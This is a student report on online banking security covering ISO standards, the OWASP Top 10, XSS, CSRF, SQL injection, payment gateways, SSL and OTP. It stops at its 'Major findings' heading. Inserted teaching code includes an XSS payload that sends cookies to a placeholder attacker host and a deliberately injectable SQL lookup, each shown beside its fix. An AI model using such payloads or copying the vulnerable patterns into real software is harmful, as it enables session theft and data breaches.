
FMG 20 C Group 4

FMG 20 C Online Banking Security

Submitted to Prof. V.M. Mathur

FMG 20C Group 4
Rishi Kalantri 201128
Samridh Nagpal 201141
Shefali Gupta 201151
Udit Bubna 201168
Vaibhav Aggarwal 201171
Veeneet Jain 201173

Page | 1


Table of Contents

Introduction 3
Background 5
Objective of the study 8
Literature Review 9
Methodology 12
  Sample Selection 12
  Primary Data 12
  Secondary Data 12
  Statistical Tools 12
Analysis 13
  Web Application security risk 13
  Open Web Application Security Project (OWASP) 14
  Cross-Site Scripting (XSS) 15
  Cross-Site Request Forgery (CSRF) 17
  SQL Injection 19
  Payment Gateways 21
  SSL: Secure Socket Layer 24
  OTP: One Time Password 25
Major findings 26
Recommendations 26
Further scope of the study 27
References 28


Online Banking Security


Introduction
While the internet offers enormous advantages and opportunities, it also presents various security risks. With this in mind, banks take extensive steps to protect the information transmitted and processed when banking online. This includes, for example, ensuring that confidential data sent over the internet cannot be read or modified by unauthorised third parties. But banks normally have no influence over the systems used by their customers. The choice is entirely up to the customer. Moreover, the system selected, a PC connected to the internet for example, will usually be used for a number of other applications as well. The systems used by online banking customers are therefore exposed to risks beyond the bank's control, and for this reason banks cannot assume liability for them. The banks have a number of measures in place that offer effective protection against attacks when information is sent over the internet or processed by the bank's servers.

Online banking is growing almost everywhere; in the UK, for example, there was a 168% increase in the number of users between 2001 and 2011. This is easy enough to explain: online banking is convenient for customers, and lets banks cut their staff costs. But as banking has moved online, fraud has followed. Losses in the UK from online banking fraud were £21.4m in the period January to June 2008, an increase of 185% compared with the same period of the previous year.

While Internet banking brought banks to the desktop, mobile banking is bringing them right into users' pockets. However, in an age of uncontrolled cyber crime, security is the primary concern. The remarkable increase in cellular phone usage has been followed by an increase in mobile fraud. Many users are concerned about security when carrying out financial transactions over the mobile network.

Mobile is often the only means of access available for millions of users in many countries. A report published by IMS [62] on Mobile Applications and Services indicates that mobile penetration in many developing markets is far higher than that of banking or fixed-line infrastructure. However, lack of security is seen as the biggest deterrent to the widespread adoption of mobile financial services. KPMG LLP examined trends in the use of mobile technology among more than 4,000 people in 19 countries worldwide: 91% of respondents said they had never tried banking through a mobile device, and 48% of those who had not cited security and privacy as the primary reason. This report will investigate the current security of mobile banking in addition to the security of online banking, focusing on user authentication, and will also analyse a model that would further enhance access security using RFID.


Background
For several years now, electronic banking platforms have been implemented as an ever more efficient channel through which banking transactions can be done without having to leave the house or office. In the end, however, these home banking platforms are web-based applications that are exposed over the Internet, making their users a very appealing target for mal-intentioned individuals. These are some reasons why e-banking platforms are such an alluring objective for criminals to attack:

Overview of Information Security Standards

Information security plays an important role in protecting the assets of an organization. As no single formula can guarantee 100% security, there is a need for a set of benchmarks or standards to help ensure that an adequate level of security is attained, resources are used efficiently, and the best security practices are adopted. While information security plays an important role in protecting the data and assets of an organization, we often hear news about security incidents such as defacement of websites, server hacking and data leakage. Organizations need to be fully aware of the need to devote more resources to the protection of information assets, and information security must become a top concern in both government and business. To address the situation, a number of governments and organizations have set up benchmarks, standards and, in some cases, legal regulations on information security to help ensure that an adequate level of security is maintained, resources are used in the right way, and the best security practices are adopted. Some industries, such as banking, are regulated, and the guidelines or best practices put together as part of those regulations often become a de facto standard among members of these industries.

While these laws and regulations do a good job of defining the scope of information security and spelling out its role in risk management, they have little to say about what constitutes effective information security or how to achieve it. Fortunately, the International Organization for Standardization (ISO) has developed two standards that do precisely that, and by adhering to them banks can go a long way toward satisfying regulatory compliance requirements.

The two standards, ISO 17799 and ISO 27001, together provide a set of best practices and a certification standard for information security. Both are derived from a British standard, BS 7799, which for many years served as the authority for information security. BS 7799 came in two parts: part one, BS 7799-1, became ISO 17799, while BS 7799-2 became ISO 27001.

ISO 17799 provides best practice recommendations for initiating, implementing, or maintaining information security management systems. Information security is defined within the standard as the preservation of confidentiality (ensuring that information is accessible only to those authorized to have access), integrity (safeguarding the accuracy and completeness of information and processing methods) and availability (ensuring that authorized users have access to information and associated assets when required).

The standard contains 12 sections: risk assessment and treatment; security policy; organization of information security; asset management; access control; information security incident management; human resources security; physical and environmental security; communications and operations management; information systems acquisition, development and maintenance; business continuity management; and compliance.

Within each section, information security control objectives are specified and a range of controls are outlined that are generally regarded as best practices. For each control, implementation guidance is provided. Each organization is expected to perform an information security risk assessment prior to implementing controls.

The second standard, ISO 27001, specifies requirements for establishing, implementing, maintaining, and improving an information security management system consistent with the best practices outlined in ISO 17799. Previously, organizations could only be officially certified against the British Standard (or national equivalents) by certification/registration bodies accredited by the relevant national standards organizations. Now the international standard can be used for certification.

ISO 27001 is the first standard in a proposed series of information security standards which will be assigned numbers within the ISO 27000 series. ISO 17799 was renamed ISO 27002 in 2007. ISO 27004, Information Security Management Metrics and Measurement, is in the works and currently in draft.

Certification is entirely voluntary but is increasingly being demanded from suppliers and business partners who are concerned about information security. Certification against ISO 27001 brings a number of benefits. Independent assessment brings rigor and formality to the implementation process, implying improvements to information security and associated risk reduction, and requires management approval, which promotes security awareness.


Objective of the study


Security breaches can have a far-reaching impact not only on a company's finances but on its reputation as well. Companies and banks are required to prove their compliance with these regulations and will be held liable for failure to do so. There is an expectation from customers, employees and partners, anyone who entrusts a company with their sensitive information, that this information will be protected. Financial organizations must consider all of the potential damage that can be done to their business if sensitive data is lost or stolen: lawsuits, negative publicity, loss of sales and customer confidence, and permanently tarnished reputations. Studies have shown that the financial services industry has become a primary target of cyber-attacks on a global scale. This is not surprising considering the highly valuable information that all financial service providers (FSPs) collect and maintain on a daily basis. The objectives of this report are as follows:
- To study the various security breaches that can impact the information security of banks.
- To understand the current information security standards available.
- To understand customer preference for online banking.
- To understand how far customers have faith in banking online.
- To understand what security measures have been employed by various banks.
- To compare and contrast the online security of two nationalised and two private banks in India.
- To compare and contrast the security provided in the zonal and branch offices of the banks.


Literature Review
The Internet has played a key role in changing how we interact with other people and how we do business today. As a result of the Internet, electronic commerce has emerged, allowing businesses to interact more effectively with their customers and with other corporations inside and outside their industries. One industry that is using this new communication channel to reach its customers is the banking industry. The electronic banking system addresses several emerging trends: customers' demand for anytime, anywhere service, product time-to-market imperatives and increasingly complex back-office integration challenges. The challenges that oppose electronic banking are the concerns over security and privacy of information. A review of the literature related to this topic revealed a variety of results.

In an extensive study of best security practices in online banking by Easy Solutions (a security vendor focused exclusively on fraud prevention, providing anti-phishing services and research, multifactor authentication and anomalous transaction detection), it was noted that home banking platforms have been implemented as an ever more efficient channel for banking transactions. However, these web-based applications are exposed over the Internet, making their users a very appealing target for mal-intentioned individuals. The study recommends implementing robust authentication strategies to strengthen the authentication process, not only because of pressure to meet regulations but also because of the high exposure of e-banking platforms to attacks. One such platform recommended was Detect ID, which the vendor describes as the only authentication platform that combines the capability of detecting malicious processes during the authentication process with the objective of shielding the authentication cycle from malware.
The paper recommends implementing robust authentication strategies to strengthen the authentication process, not only because of pressure to meet regulations but also because of the high exposure of e-banking platforms to phishing and pharming attacks, which can compromise the organization's image and produce financial losses. Focusing on a multi-layer protection approach is the best alternative for mass authentication processes of applications that are highly exposed on the Internet, including a mix of different factors that allow:
- Shielding the authentication cycle from malicious processes that can affect the end user's station
- Providing user-to-site authentication strategies which allow the end user to verify that the connection is indeed established with the correct site
- Implementing authentication factors that eliminate user decisions from the authentication equation
- Implementing authentication factors based on knowledge (what the bank knows about the end user)
- Implementing authentication factors based on something that the user has (OTP, USB device, etc.)
- Offering complementary protection for the end user's station
- Communicating the occurrence of potential transaction frauds to the end user

A study on online banking security by the Bankenverband, Berlin, revealed that while the internet offers enormous advantages and opportunities, it also presents various security risks. What are the typical dangers faced when using the internet for banking? The most common danger is third parties accessing, deleting or tampering with data while it is being transmitted, or obtaining information under false pretences. The banks have a number of measures in place that offer effective protection against attacks when information is sent over the internet or processed by the banks' servers. The study also describes the steps customers need to take to ensure their own safety: they should be security conscious when using the internet and should check their bank statements regularly.

A research paper on Using RFID to Enhance Mobile Banking Security by Zakaria Saleh and Izzat Alsmadi discusses how mobile banking is introducing a new generation of location-independent financial services using mobile terminals, allowing users to make payments, check balances, transfer money between accounts and generate statements of recent transactions on their cellular phones. While providing anywhere, anytime banking to the user, the service should be secure, and security needs to be implemented at various levels, starting from SIM card security, through mobile software security, to secure customer access to banking services. The focus of this study was on RFID applications in cell phones, and more particularly on banking applications. A smartphone with an RFID reader can be placed on a tag located on a piece of equipment and use the wireless network to browse the Internet. Similar to wireless sensors, RFID-enabled phones can collect data in real time for many applications such as automatic tracking of materials, items, weather status, etc. Banks rely on users having their mobile phones with them all the time; hence, as a security measure, banks can send alerts at any time in order to provide enhanced security and services. This paper analyses the security issues in mobile banking and proposes improved security for mobile banking services using RFID. The Radio Frequency Identification (RFID) system at the very simplest level consists of a tag (or transponder) and a reader (or interrogator) with an antenna. Tags can be passive, with no power source, or active. The technology allows for the transmission of a serial number wirelessly, using radio waves. The study also suggests two ways to integrate RFID with a wireless smartphone: a smartphone with RFID tags, and a smartphone with an RFID reader. The first is a typical cell phone that has an RFID chip embedded or attached, with some identification information programmed on it. It is also equipped with an RF antenna to be able to communicate with RFID readers when they are within range. The RFID tag information is sent to the reader, and the reader can write information back to the phone. The second type contains an RFID reader that can collect data from various RFID tags, also with an RF antenna.

Best Practices for Online Banking Security by Rohit K. Agrawal is an extensive study providing introductory knowledge and awareness of the information security standards in financial institutions and their offered services. It also explains the role of authentication and security best practices in these institutions. This research paper describes security breaches and their impact on various organizations. The study gives various insights into financial institutions and their offered services, information security standards, online security breaches and their causes, types of security breaches, security best practices, the role of authentication, and the consequences of poor online security.

Optimised to Fail: Card Readers for Online Banking, a study by Saar Drimer, Steven J. Murdoch, and Ross Anderson, discusses the Chip Authentication Programme (CAP) that was introduced by banks in Europe to deal with soaring losses from online banking fraud. A handheld reader is used together with the customer's debit card to generate one-time codes for both login and transaction authentication.


Methodology
This chapter describes the methodology used to carry out the online banking security study: the method of data collection, the tools used for data collection, the type of sampling, the sample size, and the analysis performed.

Sample Selection
Owing to time constraints, and this being a learning exercise, the research was narrowed down to just four banks so that an in-depth analysis could be carried out. The researchers used a convenience sampling method. Employees of the following four banks were interviewed on various questions regarding online banking security:
- State Bank of Hyderabad
- HDFC Bank
- Kotak Mahindra Bank
- Deutsche Bank

Primary Data
The primary data was collected through personal interviews with employees of the four banks listed above. Around five employees were interviewed about online banking security. For security reasons the employees could not give exact details, but they shared an idea of the technology and processes in use. In addition to the employee interviews, a customer satisfaction survey was circulated through channels such as email, Facebook and Twitter; 52 respondents completed the survey.

Secondary Data
The researchers gathered material from various online security books, journals and magazines. The official website of the Open Web Application Security Project was also studied to understand its process. Various research articles were studied to understand the latest innovations in online banking security.

Statistical Tools
Minitab and MS Excel have been used to analyse the data that has been collected.

Analysis
Web Application security risk
Attackers can potentially use many different paths through your application to do harm to your business or organization. Each of these paths represents a risk that may, or may not, be serious enough to warrant attention. Sometimes, these paths are trivial to find and exploit and sometimes they are extremely difficult. Similarly, the harm that is caused may range from nothing, all the way through putting you out of business. To determine the risk to your organization, you can evaluate the likelihood associated with each threat agent, attack vector, and security weakness and combine it with an estimate of the technical and business impact to your organization. Together, these factors determine the overall risk.

Risk Categorisation

This update to the OWASP Top 10 focuses on identifying the most serious risks for a broad array of organizations. For each of these risks, we provide generic information about likelihood and technical impact using the following simple ratings scheme, which is based on the OWASP Risk Rating Methodology.

Attack Vector | Weakness Prevalence | Weakness Detectability | Technical Impact | Business Impact
Easy          | Widespread          | Easy                   | Severe           | ?
Average       | Common              | Average                | Moderate         | ?
Difficult     | Uncommon            | Difficult              | Minor            | ?

However, only you know the specifics of your environment and your business. For any given application, there may not be a threat agent that can perform the relevant attack, or the technical impact may not make any difference. Therefore, you should evaluate each risk for yourself, focusing on the threat agents, security controls, and business impacts in your enterprise. Although previous versions of the OWASP Top 10 focused on identifying the most common vulnerabilities, they were also designed around risk. The names of the risks in the Top 10 stem from the type of attack, the type of weakness, or the type of impact they cause. We chose the name that is best known and will achieve the highest level of awareness.

Open Web Application Security Project (OWASP)


The Open Web Application Security Project (OWASP) is an open-source application security project. The OWASP community includes corporations, educational organizations, and individuals from around the world. This community works to create freely available articles, methodologies, documentation, tools, and technologies. The OWASP Foundation is a charitable organization that supports and manages OWASP projects and infrastructure; it has also been a registered non-profit in Europe since June 2011. OWASP is not affiliated with any technology company, although it supports the informed use of security technology. OWASP has avoided affiliation because it believes freedom from organizational pressures makes it easier to provide unbiased, practical, cost-effective information about application security. OWASP advocates approaching application security by considering the people, process, and technology dimensions.


OWASP Top 10 Application Security Risks - 2010

A1 - Injection: Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.

A2 - Cross Site Scripting (XSS): XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

A3 - Broken Authentication and Session Management: Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, session tokens, or exploit other implementation flaws to assume other users' identities.

A4 - Insecure Direct Object References: A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.

A5 - Cross Site Request Forgery (CSRF): A CSRF attack forces a logged-on victim's browser to send a forged HTTP request, including the victim's session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim's browser to generate requests the vulnerable application thinks are legitimate requests from the victim.

A6 - Security Misconfiguration: Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. All these settings should be defined, implemented, and maintained, as many are not shipped with secure defaults. This includes keeping all software up to date, including all code libraries used by the application.

A7 - Insecure Cryptographic Storage: Many web applications do not properly protect sensitive data, such as credit cards, SSNs, and authentication credentials, with appropriate encryption or hashing. Attackers may steal or modify such weakly protected data to conduct identity theft, credit card fraud, or other crimes.

A8 - Failure to Restrict URL Access: Many web applications check URL access rights before rendering protected links and buttons. However, applications need to perform similar access control checks each time these pages are accessed, or attackers will be able to forge URLs to access these hidden pages anyway.

A9 - Insufficient Transport Layer Protection: Applications frequently fail to authenticate, encrypt, and protect the confidentiality and integrity of sensitive network traffic. When they do, they sometimes support weak algorithms, use expired or invalid certificates, or do not use them correctly.

A10 - Unvalidated Redirects and Forwards: Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.

Cross-Site Scripting (XSS)


Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute it. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page.

Cross-Site Scripting (XSS) attacks occur when:
- Data enters a web application through an untrusted source, most frequently a web request.
- The data is included in dynamic content that is sent to a web user without being validated for malicious code.

The malicious content sent to the web browser often takes the form of a segment of JavaScript, but may also include HTML, Flash or any other type of code that the browser may execute. The variety of attacks based on XSS is almost limitless, but they commonly include transmitting private data like cookies or other session information to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user's machine under the guise of the vulnerable site.
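As an added example (not code from the original report), the following Python snippet shows the two reflection points just described, an HTML body and a quoted attribute, first rendered with the raw request parameter and then with entity encoding via html.escape. Rather than grepping the output for strings, it feeds the rendered markup through Python's HTMLParser, which tokenises it the way a browser would, and lists the executable constructs (script elements and on* event handlers) that survive. The sample inputs are constructed for the example, and attacker.example is a placeholder host.

```python
import html
from html.parser import HTMLParser

# Constructed sample inputs (not taken from the original report).
BENIGN_NAME = "Alice"
SCRIPT_PAYLOAD = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'
ATTRIBUTE_BREAKOUT = '" onmouseover="alert(document.cookie)'


def render_greeting_vulnerable(name):
    """Reflects the request parameter straight into the HTML body."""
    return f"<p>Welcome back, {name}!</p>"


def render_greeting_safe(name):
    """HTML body context: entity-encode <, >, & and both quote characters."""
    return f"<p>Welcome back, {html.escape(name, quote=True)}!</p>"


def render_input_vulnerable(nick):
    """Echoes the value back inside a quoted attribute without encoding,
    so a leading double quote lets the attacker add new attributes."""
    return f'<input type="text" name="nick" value="{nick}">'


def render_input_safe(nick):
    """Quoted attribute context: the same encoding keeps the value inside the quotes."""
    return f'<input type="text" name="nick" value="{html.escape(nick, quote=True)}">'


class ActiveContentDetector(HTMLParser):
    """Parses the rendered page the way a browser would and records what
    would execute: <script> elements and on* event-handler attributes."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        for attr_name, _ in attrs:
            if attr_name.startswith("on"):
                self.findings.append(f"event handler {attr_name}")


def active_content(markup):
    """Return the executable constructs a browser would find in `markup`
    (an empty list means the input was rendered as inert text)."""
    detector = ActiveContentDetector()
    detector.feed(markup)
    detector.close()
    return detector.findings


if __name__ == "__main__":
    for label, page in [
        ("vulnerable body", render_greeting_vulnerable(SCRIPT_PAYLOAD)),
        ("escaped body", render_greeting_safe(SCRIPT_PAYLOAD)),
        ("vulnerable attribute", render_input_vulnerable(ATTRIBUTE_BREAKOUT)),
        ("escaped attribute", render_input_safe(ATTRIBUTE_BREAKOUT)),
    ]:
        print(f"{label:22} -> {active_content(page) or 'nothing executable'}")
```

html.escape is the right encoder for the HTML body and for quoted attribute values; it is not sufficient for data placed inside a script block, a URL, or a CSS value, each of which needs its own context-specific encoding. Browsers do not decode entities inside a script element, so a value interpolated there has to be serialised as a JavaScript string literal (for example with json.dumps) rather than entity-encoded.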


Cross-Site Request Forgery (CSRF)


CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he or she is currently authenticated. With a little help from social engineering (such as sending a link via email or chat), an attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end-user data and operations in the case of a normal user. If the targeted end user is the administrator account, this can compromise the entire web application.

Cross-Site Request Forgery (CSRF) is an attack that tricks the victim into loading a page that contains a malicious request. It is malicious in the sense that it inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf, such as changing the victim's e-mail address, home address or password, or purchasing something. CSRF attacks generally target functions that cause a state change on the server, but can also be used to access sensitive data. For most sites, browsers will automatically include with such requests any credentials associated with the site, such as the user's session cookie, basic auth credentials, IP address, Windows domain credentials, etc. Therefore, if the user is currently authenticated to the site, the site will have no way to distinguish this from a legitimate user request. In this way, the attacker can make the victim perform actions that they did not intend to, such as logging out, purchasing an item, changing account information, retrieving account information, or any other function provided by the vulnerable website.

Sometimes, it is possible to store the CSRF attack on the vulnerable site itself. Such vulnerabilities are called Stored CSRF flaws. This can be accomplished by simply storing an IMG or IFRAME tag in a field that accepts HTML, or by a more complex cross-site scripting attack. If the attacker can store a CSRF attack in the site, the severity of the attack is amplified. In particular, the likelihood is increased because the victim is more likely to view the page containing the attack than some random page on the Internet. The likelihood is also increased because the victim is sure to be authenticated to the site already.

Synonyms: CSRF attacks are also known by a number of other names, including XSRF, "Sea Surf", Session Riding, Cross-Site Reference Forgery and Hostile Linking. Microsoft refers to this type of attack as a One-Click attack in their threat modelling process and in many places in their online documentation.

Prevention measures that do NOT work

Using a secret cookie: Remember that all cookies, even the secret ones, will be submitted with every request. All authentication tokens will be submitted regardless of whether or not the end-user was tricked into submitting the request. Furthermore, session identifiers are simply used by the application container to associate the request with a specific session object. The session identifier does not verify that the end-user intended to submit the request.

Only accepting POST requests: Applications can be developed to only accept POST requests for the execution of business logic. The misconception is that since the attacker cannot construct a malicious link, a CSRF attack cannot be executed. Unfortunately, this logic is incorrect. There are numerous methods by which an attacker can trick a victim into submitting a forged POST request, such as a simple form hosted on the attacker's website with hidden values. This form can be triggered automatically by JavaScript or can be triggered by the victim, who thinks the form will do something else.

Key Concepts of Cross-Site Request Forgery

Malicious requests are sent from a site that a user visits to another site that the attacker believes the victim is validated against. The malicious requests are routed to the target site via the victim's browser, which is authenticated against the target site. The vulnerability lies in the affected web application, not the victim's browser or the site hosting the CSRF.

Executing a CSRF Attack

In a Cross-Site Request Forgery attack, the attacker is exploiting how the target web application manages authentication. For CSRF to be exploited, the victim must be authenticated against (logged in to) the target site. For instance, let's say examplebank.com has online banking that is vulnerable to CSRF. If we visit a page containing a CSRF attack on examplebank.com but we are not currently logged in, nothing happens. If we are logged in, however, the requests in the attack will be executed as if they were actions that we had intended to do.

Preventing Cross-Site Request Forgery (CSRF) Vulnerabilities

The most common method to prevent Cross-Site Request Forgery (CSRF) attacks is to append unpredictable challenge tokens to each request and associate them with the user's session. Such tokens should at a minimum be unique per user session, but can also be unique per request. By including a challenge token with each request, the developer can ensure that the request is valid and not coming from a source other than the user.

Finding and Remediating Cross-Site Request Forgery (CSRF) Vulnerabilities

The easiest way to check whether an application is vulnerable is to see if each link and form contains an unpredictable token for each user. Without such an unpredictable token, attackers can forge malicious requests. Focus on the links and forms that invoke state-changing functions, since those are the most important CSRF targets.
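The per-session challenge token described above, as an added Python example (not code from the report): the server mints an unpredictable token at login, embeds it as a hidden field in the legitimate form, and rejects any state-changing request whose token is missing or wrong, even though the session cookie arrives with the request. The in-memory session store, the /transfer endpoint and the field names are assumptions made for the example.

```python
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Session:
    """Server-side session record; the CSRF token lives here, never in a cookie."""
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


# Assumed stand-in for the application container's session store (keyed by session id).
SESSIONS: dict[str, Session] = {}


def login(session_id: str, user: str) -> Session:
    """Create a session and mint an unpredictable per-session CSRF token."""
    SESSIONS[session_id] = Session(user=user)
    return SESSIONS[session_id]


def render_transfer_form(session_id: str) -> str:
    """The legitimate form carries the token as a hidden field; a page on another
    origin cannot read this value, so it cannot reproduce it in a forged form."""
    token = SESSIONS[session_id].csrf_token
    return (
        '<form method="POST" action="/transfer">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        '<input name="to"><input name="amount"><button>Send</button></form>'
    )


def handle_transfer(cookies: dict, form: dict) -> tuple[int, str]:
    """State-changing endpoint. The browser attaches the session cookie to every
    request, so the cookie proves who the user is but not that they intended this
    request; the token check is what proves intent."""
    session = SESSIONS.get(cookies.get("sid", ""))
    if session is None:
        return 401, "not authenticated"
    submitted = form.get("csrf_token", "")
    # Constant-time comparison so the check does not leak token bytes via timing.
    if not hmac.compare_digest(submitted, session.csrf_token):
        return 403, "csrf token missing or invalid"
    return 200, f"{session.user} sent {form['amount']} to {form['to']}"
```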

SQL Injection
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server. SQL Injection is very common with PHP and ASP applications due to the prevalence of older functional interfaces. Due to the nature of the programmatic interfaces available, J2EE and ASP.NET applications are less likely to have easily exploited SQL injections. The severity of SQL Injection attacks is limited by the attacker's skill and imagination, and to a lesser extent by defense in depth countermeasures, such as low privilege connections to the database server and so on. In general, consider SQL Injection a high impact severity.

Preventing SQL Injection

SQL injection can be prevented if you adopt an input validation technique in which user input is checked against a set of defined rules for length, type and syntax, and also against business rules. You should ensure that users with permission to access the database have the least privileges. Additionally, do not use system administrator accounts like sa for Web applications. Also, you should always make sure that a database user is created only for a specific application and that this user is not able to access other applications. Another preventive measure is to remove all stored procedures that are not in use. Use strongly typed parameterized query APIs with placeholder substitution markers, even when calling stored procedures. Take care when using stored procedures: they are generally safe from SQL injection, but they can still be injectable (for example via the use of exec, or by concatenating arguments within the stored procedure).
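An added Python example (not from the report) over a small in-memory SQLite table constructed here: the string-concatenated lookup that injection relies on, next to the placeholder-marker form the text recommends, plus a length/type/syntax validation rule as the second layer. The accounts table and the customer-id rule are assumptions made for the example.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed in-memory accounts table standing in for the bank's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (customer TEXT, balance INTEGER)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)",
                     [("alice", 500), ("bob", 1200), ("carol", 75)])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, customer: str) -> list:
    """The pattern SQL injection relies on: user input is concatenated into the
    statement text, so the database cannot tell data from SQL syntax."""
    sql = "SELECT customer, balance FROM accounts WHERE customer = '" + customer + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, customer: str) -> list:
    """Hardened form: the '?' placeholder hands the value to the driver separately
    from the statement, so it is only ever compared as data, never parsed as SQL."""
    sql = "SELECT customer, balance FROM accounts WHERE customer = ?"
    return conn.execute(sql, (customer,)).fetchall()


def validate_customer_id(customer: str) -> bool:
    """Input validation for length, type and syntax (assumed business rule:
    a customer id is 1 to 20 lowercase letters)."""
    return 1 <= len(customer) <= 20 and customer.isalpha() and customer.islower()


def lookup_defended(conn: sqlite3.Connection, customer: str) -> list:
    """Validation plus parameterization: malformed ids never reach the database."""
    if not validate_customer_id(customer):
        raise ValueError("invalid customer id")
    return lookup_parameterized(conn, customer)
```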


Payment Gateways
There are 3 main ways of accepting payments online: you can use a payment gateway (seamless or non-seamless) to process credit card payments immediately, you can collect credit card details for offline processing, or you can use offline payment methods such as COD, cheque or direct debit and then mark your orders as paid once you check your bank account.

A payment gateway is an application service provider service that authorizes payments for e-businesses, online retailers, etc. It is the equivalent of a point-of-sale terminal located in most physical retail outlets. Payment gateways protect credit card and account details by encrypting sensitive information, such as credit card numbers, to ensure that information is passed securely between the customer and the merchant, and also between the merchant and the payment processor.

There are two types of payment gateways:

Seamless Payment Gateways: process credit cards directly on your online shop website without redirecting the purchasing customer to any 3rd party website. The whole transaction is seamless and takes place in real time.

Non-Seamless Payment Gateways: redirect the purchasing customer to the PayPal website to process the payment and redirect the customer back to the online shop after this has been completed.

Working of Payment Gateway

A payment gateway facilitates the transfer of information between a payment portal and the Front End Processor or acquiring bank.

1. A customer places an order on the website and enters their card details.
2. If the order is via a website, the customer's web browser encrypts the information to be sent. This is done via SSL (Secure Socket Layer) encryption.
3. The merchant forwards the details to their payment gateway. This is another SSL encrypted connection to the payment server hosted by the payment gateway.
4. The payment gateway forwards the transaction information to the payment processor used by the merchant's acquiring bank.
5. The payment processor forwards the transaction information to the card association (e.g., Visa/MasterCard).
6. The credit card issuing bank receives the authorization request and sends a response back to the processor with a response code (i.e. approved or declined).
7. The processor forwards the response to the payment gateway.
8. The payment gateway receives the response and forwards it on to the website, where it is interpreted to the cardholder and the merchant. The entire process typically takes 2-3 seconds.
9. The acquiring bank deposits the total of the approved funds into the merchant's nominated account. The entire process from authorization to settlement to funding typically takes 3 days.

Authorization Process

1. Customer decides to make an online purchase and inputs his credit card information.
2. Merchant's website receives the information and sends it to the payment processing service.
3. Processor routes the information to the bank that issued the customer's credit card.
4. Issuing bank sends authorization (or declination) to the processor.
5. Processor sends the result to the merchant, where it is decided to accept or reject the purchase.

Settlement Process

1. Merchant informs the payment processing service to settle transactions.
2. Processor validates the information and forwards transaction information to the issuing bank.
3. Issuing bank transfers funds to the processor.
4. Processor routes funds to the acquiring bank.
5. Acquiring bank credits the merchant's bank account.
6. Issuing bank includes the merchant's charge on the customer's credit card account.

Types of Payment Gateways

COM based gateways

Requires the merchant to have their own SSL certificate. Requires the hosting server to have DLL software installed, provided by the gateway company.

XML transport gateways

Requires own SSL certificate. Does not require a DLL; compatible with Windows-based servers.

FORM based gateways

Sometimes require own SSL certificate. Do not require any extra software to be installed on the web hosting server.

Security Issues

- Authentication of the credit card and the card holder is possible with the CVV and personal details only.
- Recorded session transmission and replay attacks.
- Since the customer is required to enter personal details, the entire communication is often carried out over the HTTPS protocol.
- To validate the request of the payment page result, sometimes the IP of the requesting server has to be verified.
- There is growing support by acquirers, issuers and subsequently by payment gateways for Virtual Payer Authentication (VPA), implemented as the 3-D Secure protocol (branded as Verified by VISA, MasterCard SecureCode and J/Secure by JCB), which adds an additional layer of security for online payments.

SSL: Secure Socket Layer


Transport Layer Security (TLS) and its predecessor, Secure Sockets Layer (SSL), are cryptographic protocols that provide communication security over the Internet. TLS and SSL encrypt the segments of network connections above the Transport Layer, using asymmetric cryptography for key exchange, symmetric encryption for privacy, and message authentication codes for message integrity.

SSL has various security measures:

- Protection against a downgrade of the protocol to a previous (less secure) version or a weaker cipher suite.
- Numbering subsequent Application records with a sequence number and using this sequence number in the message authentication codes (MACs).
- Using a message digest enhanced with a key (so only a key-holder can check the MAC).
- At the end of the handshake, the "Finished" message sends a hash of all the exchanged handshake messages seen by both parties.

SSL 3.0 improved upon SSL 2.0 by adding SHA-1 based ciphers and support for certificate authentication.


OTP: One Time Password


A one-time password (OTP) is a password that is valid for only one login session or transaction. The most important shortcoming that is addressed by OTPs is that, in contrast to static passwords, they are not vulnerable to replay attacks. An OTP may be generated by devices and be based upon:

- Time synchronization: use of RSA SecurID tokens.
- Mathematical algorithms: a few unknown mathematical functions come together to create an OTP.

Methods of delivery of OTP:

- Proprietary tokens
- Web based or through emails
- Mobile phones
- Paper


Major findings
1. Various security breaches that can impact the security of the bank:
